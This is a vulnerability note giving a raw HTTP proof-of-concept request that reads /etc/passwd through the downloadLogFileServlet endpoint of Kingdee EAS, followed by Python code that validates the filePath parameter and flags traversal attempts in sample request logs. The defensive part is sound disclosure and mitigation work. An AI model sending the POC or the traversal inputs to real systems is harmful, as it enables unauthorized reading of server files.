
Kingdee EAS (some versions) downloadLogFileServlet arbitrary file read

POC

POST /easadmin/downloadLogFileServlet HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 20

filePath=/etc/passwd
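The following is an added example and is not part of the original note or of Kingdee's code. It shows, from the defender's side, the check a servlet like this needs: the filePath parameter is confined to the log directory so that absolute paths and traversal sequences are rejected, and the same check is reused to flag suspicious requests to the endpoint in a request log. The endpoint and parameter name come from the POC above; the log directory and the sample request lines are constructed assumptions.

```python
import posixpath
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

# Assumed log directory served by the servlet; the original note does not state it.
LOG_DIR = "/opt/kingdee/eas/server/logs"  # hypothetical

ENDPOINT = "/easadmin/downloadLogFileServlet"  # from the POC


def is_safe_log_path(file_path: str, base_dir: str = LOG_DIR) -> bool:
    """Return True only if file_path names a file inside base_dir.

    The value is treated as a name relative to the log directory: absolute
    paths, NUL bytes and any '..' sequence that escapes base_dir are rejected.
    The check runs on the already URL-decoded value, so the caller must decode
    exactly once (parse_qs does that below).
    """
    if not file_path or "\x00" in file_path:
        return False
    if posixpath.isabs(file_path):
        return False
    base = posixpath.normpath(base_dir)
    resolved = posixpath.normpath(posixpath.join(base, file_path))
    return resolved == base or resolved.startswith(base + "/")


def extract_file_path(body: str) -> Optional[str]:
    """Pull the filePath parameter out of a form-encoded POST body."""
    params = parse_qs(body, keep_blank_values=True)
    values = params.get("filePath")
    return values[0] if values else None


# Constructed request records (method, path, body); not real traffic.
SAMPLE_REQUESTS: List[Tuple[str, str, str]] = [
    ("POST", ENDPOINT, "filePath=server.log"),
    ("POST", ENDPOINT, "filePath=/etc/passwd"),
    ("POST", ENDPOINT, "filePath=..%2F..%2Fetc%2Fpasswd"),
    ("POST", ENDPOINT, "filePath=archive/2024-01-01.log"),
    ("GET", "/easadmin/index.jsp", ""),
]


def flag_requests(requests: List[Tuple[str, str, str]]) -> List[Tuple[str, Optional[str]]]:
    """Return (path, filePath) for every request to the endpoint whose
    filePath is missing or escapes the log directory."""
    flagged = []
    for _method, path, body in requests:
        if path != ENDPOINT:
            continue
        file_path = extract_file_path(body)
        if file_path is None or not is_safe_log_path(file_path):
            flagged.append((path, file_path))
    return flagged


if __name__ == "__main__":
    for path, file_path in flag_requests(SAMPLE_REQUESTS):
        print(f"suspicious request to {path}: filePath={file_path!r}")
```

Resolving the joined path with normpath before comparing it to the base directory is what defeats the `..` variants; comparing the raw string against a prefix, or only searching for the literal `../`, would miss the URL-encoded form in the third sample.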